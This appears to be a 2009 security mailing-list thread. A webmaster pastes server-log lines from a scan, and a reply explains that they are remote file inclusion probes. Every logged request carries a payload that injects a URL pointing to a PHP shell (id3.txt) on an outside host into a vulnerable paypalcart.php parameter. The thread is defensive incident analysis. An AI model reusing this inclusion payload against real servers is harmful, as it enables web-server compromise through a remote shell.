Hi Stefan,
Thanks for you answer. I honestly didn't dare to take a look at the txt
file ;), but in this case, it had certainly been interesting.
As I already mentioned in the mail to Tom, the directory /ju-album contains
html pages with links to the Exhibit Engine, so perhaps that's the reason
why someone run the scan.
Here are the first 8 GET requests (46 in total) from the server log. The IP
changes again and again, but it's more or less always the same URLs it
tried to visit.
87.106.245.44 - - [01/Jan/2009:21:55:32 +0100] "GET
/ju-album/slides//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt?
HTTP/1.1" 404 5971 "-" "libwww-perl/5.805"
87.106.245.44 - - [01/Jan/2009:21:55:32 +0100] "GET
//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt?
HTTP/1.1" 404 5898 "-" "libwww-perl/5.805"
87.106.245.44 - - [01/Jan/2009:21:55:33 +0100] "GET
/ju-album//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt?
HTTP/1.1" 404 5934 "-" "libwww-perl/5.805"
194.117.233.60 - - [01/Jan/2009:21:59:33 +0100] "GET
/ju-album/slides//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt?
HTTP/1.1" 404 5945 "-" "libwww-perl/5.814"
194.117.233.60 - - [01/Jan/2009:21:59:33 +0100] "GET
//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt?
HTTP/1.1" 404 5905 "-" "libwww-perl/5.814"
194.117.233.60 - - [01/Jan/2009:21:59:33 +0100] "GET
/ju-album//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt?
HTTP/1.1" 404 5941 "-" "libwww-perl/5.814"
87.106.245.44 - - [01/Jan/2009:22:08:13 +0100] "GET
/ju-album/slides/DSC_5633.html//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt?
HTTP/1.1" 404 6022 "-" "libwww-perl/5.805"
I hope this helps :)
Simon
Stefan Tanase wrote:
> Hello Simon,
>
> Simon wrote:
>> Yesterday evening I had lots of 404-messages from my web server, all
>> pointing to locations like
>> http://foo.bar/something//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt?
>>
>
> ID3 is a well known PHP shell - PHP shells are scripts used by "bad
> guys" to gain access to your web server through an exploitable page in
> your website, for example through a vulnerable include statement.
>
>> I don't use paypal or anything similar on my page; what does that mean?
>>
>
> They are usually scanning thousands of web servers in search of the same
> vulnerabilities. You may not be using those vulnerable scripts (like
> paypalcart.php in this case) but some other webmasters may do :)
>
>> I'm wondering because this messages came in only yesterday before
>> midnight, several dozens.
>>
>
> Popular websites get requests like this 24/7 - it's just a matter of
> time until your server is found and they start scanning it for
> vulnerabilities.
>
> It's a good idea to keep an watch on this stuff, so you can make sure
> your websites are not vulnerable.
>
> Cheers,
-------------------------------------------------------------------------
Sponsored by: Watchfire
Methodologies & Tools for Web Application Security Assessment
With the rapid rise in the number and types of security threats, web application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today!
https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F
-------------------------------------------------------------------------
Received on Jan 04 2009
Intro
